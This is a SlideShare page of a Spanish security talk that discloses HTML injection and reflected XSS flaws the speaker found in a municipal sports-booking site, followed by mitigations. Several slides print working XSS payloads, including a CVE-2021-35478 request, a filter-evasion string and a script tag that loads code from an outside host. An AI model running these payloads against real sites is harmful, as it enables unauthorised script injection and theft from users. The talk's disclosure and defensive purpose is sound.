SlideShare a Scribd company logo

Descubriendo vulnerabilidades en organismo público

Download as PPTX, PDF
D
DavidPadillaAlvarado

Ponencia C1B3rwall

Engineering
1 of 25
Exponiendo la verdad: descubriendo vulnerabilidades relevantes en un organismo público– HTML Injection y XSS en acción. David Padilla Alvarado https://c1b3rwall.policia.es/
https://c1b3rwall.policia.es/ WHOAMI • Graduado en Ingeniería Telemática (Universidad de Jaén) • Máster oficial en seguridad informática (Universidad Internacional de la Rioja) • Máster propio en seguridad ofensiva (Universidad Católica san Antonio de Murcia) • Máster propio en ciberseguridad empresarial en entornos Microsoft (Verne academy) • Distintas certificaciones de ciberseguridad: eJPT, eWPT, PNPT, CCNA, eCPPTv2,CSX, CPHE,CSFPC,CPHP, entre otros. • Fundador del congreso de ciberseguridad en Jaén (Hack-én): https://hack-en.org/ • Autor del blog de ciberseguridad ciberpadi: https://ciberpadi.es/ • Cibercooperante de INCIBE • Contacto MyPublicInbox: https://mypublicinbox.com/DavidPadilla • Red Team Operator en Plexus Tech
https://c1b3rwall.policia.es/ Ciberataques en España. Según un informe de Deusto Formación sobre Amenazas Globales, los ciberataques están aumentando un 300% desde 2020, y como consecuencia de ello, el 40% de las empresas españolas ya han sufrido un ataque cibernético. Aun así, España está por debajo de países como Estados Unidos, donde el 58% de las compañías son atacadas, o Francia (con el 60%).
https://c1b3rwall.policia.es/ Ciberataques a nivel mundial. Source: https://www.ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf Source: https://www.diarioabierto.es/661320/el-cibercrimen-alcanza-un-valor-del-15-del-pib-mundial
https://c1b3rwall.policia.es/ OWASP ¿Qué es OWASP? • Open Web Application Security Project. Es una metodología de seguridad de código abierto y colaborativa que se utiliza como referente para auditorias de seguridad de aplicaciones web. • Organización sin ánimo de lucro. • Materia gratuito y fácilmente accesible en su web. • OWASP Top 10. • Apoyo financiero a través de patrocinadores y empresas. • Promueve el desarrollo seguro.
https://c1b3rwall.policia.es/ OWASP TOP 10 Hay tres nuevas categorías, cuatro categorías con cambios de nombre y alcance, y alguna consolidación en el Top 10 de 2021. Hemos cambiado los nombres cuando ha sido necesario para centrarnos en la causa principal en lugar del síntoma. Source: https://owasp.org/Top10/es/
https://c1b3rwall.policia.es/ HTML Injection La inyección HTML es un tipo de vulnerabilidad de inyección que ocurre cuando un usuario puede controlar un punto de entrada y puede inyectar código HTML arbitrario en una página web vulnerable.
https://c1b3rwall.policia.es/ HTML Injection Un tercero podría aprovechar la incorrecta validación de entrada por parte del usuario para realizar un tipo de ataque que modifique el aspecto visual de la página denominado como defacement. Fuente: https://blog.segu-info.com.ar/2009/12/deface-twitter-por-un-ataque-del.html
https://c1b3rwall.policia.es/ HTML Injection Reflected.
https://c1b3rwall.policia.es/ HTML Injection Stored.
https://c1b3rwall.policia.es/ Cross-Site Scripting (XSS) Es una inyección de código malicioso, que se ejecutará en el navegador de la víctima. El script malicioso puede guardarse en el servidor web y ejecutarse cada vez que el usuario llame a la funcionalidad correspondiente. También se puede realizar sin ningún script guardado en el servidor web.
https://c1b3rwall.policia.es/ Cross-Site Scripting (XSS) Reflected. Se descubrió una vulnerabilidad XSS reflected en Nagios Log Server (CVE-2021-35478). URL: GET /nagioslogserver/admin/audit-log?time=24h start= end= type= search= HTTP/1.1. La hora, el inicio, el final, el tipo y el parámetro de búsqueda eran vulnerables a Reflected XSS. GET /nagioslogserver/admin/audit-log?time=24h"><script>alert(1)</script> start= end= type= search= HTTP/1.1
https://c1b3rwall.policia.es/ Cross-Site Scripting (XSS) Stored. El parámetro pp para los resultados por página en el registro de auditoría y la página del historial de alertas era vulnerable a Stored XSS.
https://c1b3rwall.policia.es/ Exponiendo la verdad. Se descubrió una vulnerabilidad web dentro del patronato de deportes de un Ayuntamiento el cual un tercero podría aprovecharse del hecho de la ausencia de validación de la entrada por parte del usuario para realizar distintos tipos de ataques web. En concreto, a la hora de hacer clic en un espacio libre para reservar una pista deportiva, tecnologías como Jquery, Bootstrap, ASP.NET (2012) se encontraban totalmente desactualizados y fuera de soporte dando lugar a posibles exploits en recursos como exploit-db entre otros.
https://c1b3rwall.policia.es/ Exponiendo la verdad. HTML Injection. Se pudo confirmar que el campo del formulario ‘Datos del envío del justificante’ no presentaba una restricción de caracteres especiales, en concreto los etiquetado de apertura y cierre de etiquetas como html ‘<‘,’>’, que podían permitir a un tercero inyectar código malicioso.
https://c1b3rwall.policia.es/ Pero no todo son buenas noticias…
https://c1b3rwall.policia.es/ Restricción de caracteres. La protección ASP.NET permitía que hubiese restricción de caracteres. Se probó un conjunto de payloads por un diccionario dado y se observó que solamente se podían inyectar ciertos caracteres. (Consejo para profesionales de red team el siguiente recurso XSS Filter Evasion by OWASP: https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html) Véase el caso del ejemplo: <h1/onmouseover='u0061lert(1)'>%00
https://c1b3rwall.policia.es/ Exponiendo la verdad. ¿Y si probamos con etiquetas propias de JavaScript?...
https://c1b3rwall.policia.es/ Exponiendo la verdad. 1. Dado este punto intenté ‘jugar’ con el servidor para ver en qué punto me aceptaba como máximo la inyección de caracteres. Por ejemplo tomé este payload: <script/src=//NJ.₨></script> y la respuesta del servidor fue la siguiente: Casi…. 2. Probé ahora con el siguiente payload más acotado: <script src=//a.io> . La respuesta del servidor vez fue la siguiente: 3. Fui a la consola y efectivamente vi que se hacia una llamada al recurso www.a.io . Es decir, se puede apuntar a cargar script malicioso y realizar una petición frente a ese script.
https://c1b3rwall.policia.es/ Exponiendo la verdad. XSS. Como podía ejecutar de manera delimitada ciertos comandos, busqué el ansiado XSS, para ello utilicé Burpsuite y ejecuté un diccionario dentro de Intruder para realizar un ataque que no fuera manual para ser eficiente.
https://c1b3rwall.policia.es/ Exponiendo la verdad. XSS. Se trata de un XSS reflected. No tiene una severidad tan alta como un stored podía llevar a cabo una ejecución de código malicioso.
https://c1b3rwall.policia.es/ Medidas de mitigación. 1. Validar la entrada por parte del usuario. Los datos que no son de confianza son cualquier dato que un atacante pueda controlar, entradas de formulario HTML, cadenas de consulta, encabezados HTTP, incluso datos procedentes de una base de datos, ya que un atacante puede infringir la base de datos incluso si no pueden infringir la aplicación. 2. Implementar un ciclo de vida de desarrollo seguro SDLC en el que se involucre en un proceso de auditoría de código a los programadores encargados de lanzar un producto en un entorno de pre producción hasta un entorno final de producción. 3. Realizar auditorías continuas de código estático y código dinámico que puedan permitir detectar vulnerabilidades en el activo. 4. La aplicación no debe aceptar ningún script, carácter especial o código HTML en los campos cuando no sea necesario. Debe evitar los caracteres especiales que pueden resultar dañinos. Algunos de los personajes principales utilizados en los guiones que deben evitarse son los siguientes: < > ( ) ' “ / * ; : = { } `(comilla grave) % + ^ ! — x00-x20 (x es una notación hexadecimal; incluye Espacio, Tabulador, Retorno de carro y Avance de línea). 5. Habilitar una Política de Seguridad de Contenido (CSP) supone una defensa profunda para la mitigación de vulnerabilidades XSS. 6. Codificar todas las salidas dentro del sitio, es decir, sustituir caracteres de toda aquella cadena que desee mostrarse en pantalla por ejemplo sustituir los símbolos de menor y mayor que por sus codificaciones correspondientes para html: &lt; y &gt; respectivamente. 7. Uso del atributo Secure y HttpOnly en las cookies.
https://c1b3rwall.policia.es/ Respuesta del organismo público. Finalmente el organismo público pudo subsanar la vulnerabilidad, ejecutó una de las recomendaciones que se propuso como era impedir la inyección de caracteres especiales y actualmente no es posible realizar este tipo de ataques web asi como enviaron un email de agradecimiento.
https://c1b3rwall.policia.es/ Conclusiones. En conclusión, en esta ponencia he tratado de dar importancia a: • El proceso de ciberseguridad en una empresa ya sea dentro del sector privado o publico forma parte de todos. • Los organismos deberían de dejar de ver la ciberseguridad como un gasto. • Es recomendable realizar un ciclo de vida de desarrollo seguro en cualquier aplicación que se vaya a implementar en un sistema de producción. • En los organismos públicos y fruto de la transformación digital es adecuado que los profesionales de la ciberseguridad vayamos con ellos en ir transformando el ecosistema digital que tenemos en España hacia un espacio más seguro. • Lo más importante bajo mi punto de vista y si habéis visto los detalles que he dejado en los anteriores slides…
https://c1b3rwall.policia.es/ MUCHAS GRACIAS ¿ALGUNA PREGUNTA? https://www.linkedin.com/in/davidpadillaalvarado/ davidpadillateleco@gmail.com https://ciberpadi.es/

Recommended

Xss con javascript
Xss con javascriptXss con javascript
Xss con javascriptAlan Resendiz
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)kernelinux
 
Racciatti Html Scripting Attacks
Racciatti Html Scripting AttacksRacciatti Html Scripting Attacks
Racciatti Html Scripting AttacksCristian Borghello
 
Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Alonso Caballero
 
Seguridad en la web no confíes en el usuario
Seguridad en la web no confíes en el usuarioSeguridad en la web no confíes en el usuario
Seguridad en la web no confíes en el usuarioCarlos Soriano
 
Ataques a aplicaciones web
Ataques a aplicaciones webAtaques a aplicaciones web
Ataques a aplicaciones webAlan Resendiz
 
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Alonso Caballero
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4esmartcrimt
 

Recommended

Xss con javascript
Xss con javascriptXss con javascript
Xss con javascriptAlan Resendiz
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)kernelinux
 
Racciatti Html Scripting Attacks
Racciatti Html Scripting AttacksRacciatti Html Scripting Attacks
Racciatti Html Scripting AttacksCristian Borghello
 
Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Alonso Caballero
 
Seguridad en la web no confíes en el usuario
Seguridad en la web no confíes en el usuarioSeguridad en la web no confíes en el usuario
Seguridad en la web no confíes en el usuarioCarlos Soriano
 
Ataques a aplicaciones web
Ataques a aplicaciones webAtaques a aplicaciones web
Ataques a aplicaciones webAlan Resendiz
 
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"
Webinar Gratuito "Vulnerabilidades en Aplicaciones Web"Alonso Caballero
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4esmartcrimt
 
Xss a fondo
Xss a fondoXss a fondo
Xss a fondoAlan Resendiz
 
Que es xss
Que es xssQue es xss
Que es xssJames Jara
 
Seguridad en los sistemas web
Seguridad en los sistemas webSeguridad en los sistemas web
Seguridad en los sistemas webFacultad de Ciencias y Sistemas
 
Seguridad en Aplicaciones Web
Seguridad en Aplicaciones WebSeguridad en Aplicaciones Web
Seguridad en Aplicaciones WebCarlos Fernandez
 
Websecurify an dwebgoat terminado
Websecurify an dwebgoat terminadoWebsecurify an dwebgoat terminado
Websecurify an dwebgoat terminadoAraceli Rodriguez
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebAlonso Caballero
 
Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Andrés Gómez
 
Vulnerabilidades web
Vulnerabilidades webVulnerabilidades web
Vulnerabilidades webJoshimar Castro Siguas
 
CodeCamp 2010 | Diez formas de escribir código (in)seguro
CodeCamp 2010 | Diez formas de escribir código (in)seguroCodeCamp 2010 | Diez formas de escribir código (in)seguro
CodeCamp 2010 | Diez formas de escribir código (in)seguroMicrosoft Argentina y Uruguay [Official Space]
 
From vulnerable source to shell in two hours
From vulnerable source to shell in two hoursFrom vulnerable source to shell in two hours
From vulnerable source to shell in two hoursOwaspMadrid Chapter
 
Seguridad en php
Seguridad en phpSeguridad en php
Seguridad en phpRicardo Joel Robinson Gonzalez
 
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Alonso Caballero
 
Temas owasp
Temas owaspTemas owasp
Temas owaspFernando Solis
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Webacksec
 
Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3tantascosasquenose
 
Seguridad web
Seguridad webSeguridad web
Seguridad webcamposer
 
Web app attacks
Web app attacksWeb app attacks
Web app attacksJaime Restrepo
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridadguestbfa74a
 
Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securityseguridadelinux
 
Ataques client side exploitation
Ataques client side exploitationAtaques client side exploitation
Ataques client side exploitationjack_corvil
 
Tiempos Predeterminados MOST para Estudio del Trabajo II
Tiempos Predeterminados MOST para Estudio del Trabajo IITiempos Predeterminados MOST para Estudio del Trabajo II
Tiempos Predeterminados MOST para Estudio del Trabajo IILauraFernandaValdovi
 
Reporte de Exportaciones de Fibra de alpaca
Reporte de Exportaciones de Fibra de alpacaReporte de Exportaciones de Fibra de alpaca
Reporte de Exportaciones de Fibra de alpacajeremiasnifla
 

More Related Content

Similar to Descubriendo vulnerabilidades en organismo público

Seguridad en Aplicaciones Web
Seguridad en Aplicaciones WebSeguridad en Aplicaciones Web
Seguridad en Aplicaciones WebCarlos Fernandez
 
Websecurify an dwebgoat terminado
Websecurify an dwebgoat terminadoWebsecurify an dwebgoat terminado
Websecurify an dwebgoat terminadoAraceli Rodriguez
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebAlonso Caballero
 
Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Andrés Gómez
 
From vulnerable source to shell in two hours
From vulnerable source to shell in two hoursFrom vulnerable source to shell in two hours
From vulnerable source to shell in two hoursOwaspMadrid Chapter
 
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Alonso Caballero
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Webacksec
 
Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3tantascosasquenose
 
Seguridad web
Seguridad webSeguridad web
Seguridad webcamposer
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridadguestbfa74a
 
Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securityseguridadelinux
 
Ataques client side exploitation
Ataques client side exploitationAtaques client side exploitation
Ataques client side exploitationjack_corvil
 

Similar to Descubriendo vulnerabilidades en organismo público (20)

Xss a fondo
Xss a fondoXss a fondo
Xss a fondo
 
Que es xss
Que es xssQue es xss
Que es xss
 
Seguridad en los sistemas web
Seguridad en los sistemas webSeguridad en los sistemas web
Seguridad en los sistemas web
 
Seguridad en Aplicaciones Web
Seguridad en Aplicaciones WebSeguridad en Aplicaciones Web
Seguridad en Aplicaciones Web
 
Websecurify an dwebgoat terminado
Websecurify an dwebgoat terminadoWebsecurify an dwebgoat terminado
Websecurify an dwebgoat terminado
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones Web
 
Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1Cer tuy capacitaciones2011_v1
Cer tuy capacitaciones2011_v1
 
Vulnerabilidades web
Vulnerabilidades webVulnerabilidades web
Vulnerabilidades web
 
CodeCamp 2010 | Diez formas de escribir código (in)seguro
CodeCamp 2010 | Diez formas de escribir código (in)seguroCodeCamp 2010 | Diez formas de escribir código (in)seguro
CodeCamp 2010 | Diez formas de escribir código (in)seguro
 
From vulnerable source to shell in two hours
From vulnerable source to shell in two hoursFrom vulnerable source to shell in two hours
From vulnerable source to shell in two hours
 
Seguridad en php
Seguridad en phpSeguridad en php
Seguridad en php
 
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
Webinar Gratuito: "Escanear Vulnerabilidades Web con Zed Attack Proxy"
 
Temas owasp
Temas owaspTemas owasp
Temas owasp
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Web
 
Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3
 
Seguridad web
Seguridad webSeguridad web
Seguridad web
 
Web app attacks
Web app attacksWeb app attacks
Web app attacks
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridad
 
Seguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_securitySeguridad en servidores WEB. Modulo mod_security
Seguridad en servidores WEB. Modulo mod_security
 
Ataques client side exploitation
Ataques client side exploitationAtaques client side exploitation
Ataques client side exploitation
 

Recently uploaded

Tiempos Predeterminados MOST para Estudio del Trabajo II
Tiempos Predeterminados MOST para Estudio del Trabajo IITiempos Predeterminados MOST para Estudio del Trabajo II
Tiempos Predeterminados MOST para Estudio del Trabajo IILauraFernandaValdovi
 
Reporte de Exportaciones de Fibra de alpaca
Reporte de Exportaciones de Fibra de alpacaReporte de Exportaciones de Fibra de alpaca
Reporte de Exportaciones de Fibra de alpacajeremiasnifla
 
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kV
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kVEl proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kV
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kVSebastianPaez47
 
SEGURIDAD EN CONSTRUCCION PPT PARA EL CIP
SEGURIDAD EN CONSTRUCCION PPT PARA EL CIPSEGURIDAD EN CONSTRUCCION PPT PARA EL CIP
SEGURIDAD EN CONSTRUCCION PPT PARA EL CIPJosLuisFrancoCaldern
 
Comite Operativo Ciberseguridad 012020.pptx
Comite Operativo Ciberseguridad 012020.pptxComite Operativo Ciberseguridad 012020.pptx
Comite Operativo Ciberseguridad 012020.pptxClaudiaPerez86192
 
TAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdf
TAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdfTAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdf
TAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdfAntonioGonzalezIzqui
 
Introducción a los sistemas neumaticos.ppt
Introducción a los sistemas neumaticos.pptIntroducción a los sistemas neumaticos.ppt
Introducción a los sistemas neumaticos.pptEduardoCorado
 
SOLICITUD-PARA-LOS-EGRESADOS-UNEFA-2022.
SOLICITUD-PARA-LOS-EGRESADOS-UNEFA-2022.SOLICITUD-PARA-LOS-EGRESADOS-UNEFA-2022.
SOLICITUD-PARA-LOS-EGRESADOS-UNEFA-2022.ariannytrading
 
Flujo multifásico en tuberias de ex.pptx
Flujo multifásico en tuberias de ex.pptxFlujo multifásico en tuberias de ex.pptx
Flujo multifásico en tuberias de ex.pptxEduardoSnchezHernnde5
 
Sesión 02 TIPOS DE VALORIZACIONES CURSO Cersa
Sesión 02 TIPOS DE VALORIZACIONES CURSO CersaSesión 02 TIPOS DE VALORIZACIONES CURSO Cersa
Sesión 02 TIPOS DE VALORIZACIONES CURSO CersaXimenaFallaLecca1
 
Sesion 02 Patentes REGISTRO EN INDECOPI PERU
Sesion 02 Patentes REGISTRO EN INDECOPI PERUSesion 02 Patentes REGISTRO EN INDECOPI PERU
Sesion 02 Patentes REGISTRO EN INDECOPI PERUMarcosAlvarezSalinas
 
TALLER PAEC preparatoria directamente de la secretaria de educación pública
TALLER PAEC preparatoria directamente de la secretaria de educación públicaTALLER PAEC preparatoria directamente de la secretaria de educación pública
TALLER PAEC preparatoria directamente de la secretaria de educación públicaSantiagoSanchez353883
 
TEXTURA Y DETERMINACION DE ROCAS SEDIMENTARIAS
TEXTURA Y DETERMINACION DE ROCAS SEDIMENTARIASTEXTURA Y DETERMINACION DE ROCAS SEDIMENTARIAS
TEXTURA Y DETERMINACION DE ROCAS SEDIMENTARIASfranzEmersonMAMANIOC
 
Una estrategia de seguridad en la nube alineada al NIST
Una estrategia de seguridad en la nube alineada al NISTUna estrategia de seguridad en la nube alineada al NIST
Una estrategia de seguridad en la nube alineada al NISTFundación YOD YOD
 
¿QUE SON LOS AGENTES FISICOS Y QUE CUIDADOS TENER.pptx
¿QUE SON LOS AGENTES FISICOS Y QUE CUIDADOS TENER.pptx¿QUE SON LOS AGENTES FISICOS Y QUE CUIDADOS TENER.pptx
¿QUE SON LOS AGENTES FISICOS Y QUE CUIDADOS TENER.pptxguillermosantana15
 
Curso intensivo de soldadura electrónica en pdf
Curso intensivo de soldadura electrónica en pdfCurso intensivo de soldadura electrónica en pdf
Curso intensivo de soldadura electrónica en pdfFernandaGarca788912
 
Magnetismo y electromagnetismo principios
Magnetismo y electromagnetismo principiosMagnetismo y electromagnetismo principios
Magnetismo y electromagnetismo principiosMarceloQuisbert6
 
Diapositiva de Topografía Nivelación simple y compuesta
Diapositiva de Topografía Nivelación simple y compuestaDiapositiva de Topografía Nivelación simple y compuesta
Diapositiva de Topografía Nivelación simple y compuestajeffsalazarpuente
 
sistema de construcción Drywall semana 7
sistema de construcción Drywall semana 7sistema de construcción Drywall semana 7
sistema de construcción Drywall semana 7luisanthonycarrascos
 

Recently uploaded (20)

Tiempos Predeterminados MOST para Estudio del Trabajo II
Tiempos Predeterminados MOST para Estudio del Trabajo IITiempos Predeterminados MOST para Estudio del Trabajo II
Tiempos Predeterminados MOST para Estudio del Trabajo II
 
Reporte de Exportaciones de Fibra de alpaca
Reporte de Exportaciones de Fibra de alpacaReporte de Exportaciones de Fibra de alpaca
Reporte de Exportaciones de Fibra de alpaca
 
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kV
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kVEl proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kV
El proyecto “ITC SE Lambayeque Norte 220 kV con seccionamiento de la LT 220 kV
 
SEGURIDAD EN CONSTRUCCION PPT PARA EL CIP
SEGURIDAD EN CONSTRUCCION PPT PARA EL CIPSEGURIDAD EN CONSTRUCCION PPT PARA EL CIP
SEGURIDAD EN CONSTRUCCION PPT PARA EL CIP
 
Comite Operativo Ciberseguridad 012020.pptx
Comite Operativo Ciberseguridad 012020.pptxComite Operativo Ciberseguridad 012020.pptx
Comite Operativo Ciberseguridad 012020.pptx
 
VALORIZACION Y LIQUIDACION MIGUEL SALINAS.pdf
VALORIZACION Y LIQUIDACION MIGUEL SALINAS.pdfVALORIZACION Y LIQUIDACION MIGUEL SALINAS.pdf
VALORIZACION Y LIQUIDACION MIGUEL SALINAS.pdf
 
TAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdf
TAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdfTAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdf
TAREA 8 CORREDOR INTEROCEÁNICO DEL PAÍS.pdf
 
Introducción a los sistemas neumaticos.ppt
Introducción a los sistemas neumaticos.pptIntroducción a los sistemas neumaticos.ppt
Introducción a los sistemas neumaticos.ppt
 
SOLICITUD-PARA-LOS-EGRESADOS-UNEFA-2022.
SOLICITUD-PARA-LOS-EGRESADOS-UNEFA-2022.SOLICITUD-PARA-LOS-EGRESADOS-UNEFA-2022.
SOLICITUD-PARA-LOS-EGRESADOS-UNEFA-2022.
 
Flujo multifásico en tuberias de ex.pptx
Flujo multifásico en tuberias de ex.pptxFlujo multifásico en tuberias de ex.pptx
Flujo multifásico en tuberias de ex.pptx
 
Sesión 02 TIPOS DE VALORIZACIONES CURSO Cersa
Sesión 02 TIPOS DE VALORIZACIONES CURSO CersaSesión 02 TIPOS DE VALORIZACIONES CURSO Cersa
Sesión 02 TIPOS DE VALORIZACIONES CURSO Cersa
 
Sesion 02 Patentes REGISTRO EN INDECOPI PERU
Sesion 02 Patentes REGISTRO EN INDECOPI PERUSesion 02 Patentes REGISTRO EN INDECOPI PERU
Sesion 02 Patentes REGISTRO EN INDECOPI PERU
 
TALLER PAEC preparatoria directamente de la secretaria de educación pública
TALLER PAEC preparatoria directamente de la secretaria de educación públicaTALLER PAEC preparatoria directamente de la secretaria de educación pública
TALLER PAEC preparatoria directamente de la secretaria de educación pública
 
TEXTURA Y DETERMINACION DE ROCAS SEDIMENTARIAS
TEXTURA Y DETERMINACION DE ROCAS SEDIMENTARIASTEXTURA Y DETERMINACION DE ROCAS SEDIMENTARIAS
TEXTURA Y DETERMINACION DE ROCAS SEDIMENTARIAS
 
Una estrategia de seguridad en la nube alineada al NIST
Una estrategia de seguridad en la nube alineada al NISTUna estrategia de seguridad en la nube alineada al NIST
Una estrategia de seguridad en la nube alineada al NIST
 
¿QUE SON LOS AGENTES FISICOS Y QUE CUIDADOS TENER.pptx
¿QUE SON LOS AGENTES FISICOS Y QUE CUIDADOS TENER.pptx¿QUE SON LOS AGENTES FISICOS Y QUE CUIDADOS TENER.pptx
¿QUE SON LOS AGENTES FISICOS Y QUE CUIDADOS TENER.pptx
 
Curso intensivo de soldadura electrónica en pdf
Curso intensivo de soldadura electrónica en pdfCurso intensivo de soldadura electrónica en pdf
Curso intensivo de soldadura electrónica en pdf
 
Magnetismo y electromagnetismo principios
Magnetismo y electromagnetismo principiosMagnetismo y electromagnetismo principios
Magnetismo y electromagnetismo principios
 
Diapositiva de Topografía Nivelación simple y compuesta
Diapositiva de Topografía Nivelación simple y compuestaDiapositiva de Topografía Nivelación simple y compuesta
Diapositiva de Topografía Nivelación simple y compuesta
 
sistema de construcción Drywall semana 7
sistema de construcción Drywall semana 7sistema de construcción Drywall semana 7
sistema de construcción Drywall semana 7
 

Descubriendo vulnerabilidades en organismo público

  • 1. Exponiendo la verdad: descubriendo vulnerabilidades relevantes en un organismo público– HTML Injection y XSS en acción. David Padilla Alvarado https://c1b3rwall.policia.es/
  • 2. https://c1b3rwall.policia.es/ WHOAMI • Graduado en Ingeniería Telemática (Universidad de Jaén) • Máster oficial en seguridad informática (Universidad Internacional de la Rioja) • Máster propio en seguridad ofensiva (Universidad Católica san Antonio de Murcia) • Máster propio en ciberseguridad empresarial en entornos Microsoft (Verne academy) • Distintas certificaciones de ciberseguridad: eJPT, eWPT, PNPT, CCNA, eCPPTv2,CSX, CPHE,CSFPC,CPHP, entre otros. • Fundador del congreso de ciberseguridad en Jaén (Hack-én): https://hack-en.org/ • Autor del blog de ciberseguridad ciberpadi: https://ciberpadi.es/ • Cibercooperante de INCIBE • Contacto MyPublicInbox: https://mypublicinbox.com/DavidPadilla • Red Team Operator en Plexus Tech
  • 3. https://c1b3rwall.policia.es/ Ciberataques en España. Según un informe de Deusto Formación sobre Amenazas Globales, los ciberataques están aumentando un 300% desde 2020, y como consecuencia de ello, el 40% de las empresas españolas ya han sufrido un ataque cibernético. Aun así, España está por debajo de países como Estados Unidos, donde el 58% de las compañías son atacadas, o Francia (con el 60%).
  • 4. https://c1b3rwall.policia.es/ Ciberataques a nivel mundial. Source: https://www.ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf Source: https://www.diarioabierto.es/661320/el-cibercrimen-alcanza-un-valor-del-15-del-pib-mundial
  • 5. https://c1b3rwall.policia.es/ OWASP ¿Qué es OWASP? • Open Web Application Security Project. Es una metodología de seguridad de código abierto y colaborativa que se utiliza como referente para auditorias de seguridad de aplicaciones web. • Organización sin ánimo de lucro. • Materia gratuito y fácilmente accesible en su web. • OWASP Top 10. • Apoyo financiero a través de patrocinadores y empresas. • Promueve el desarrollo seguro.
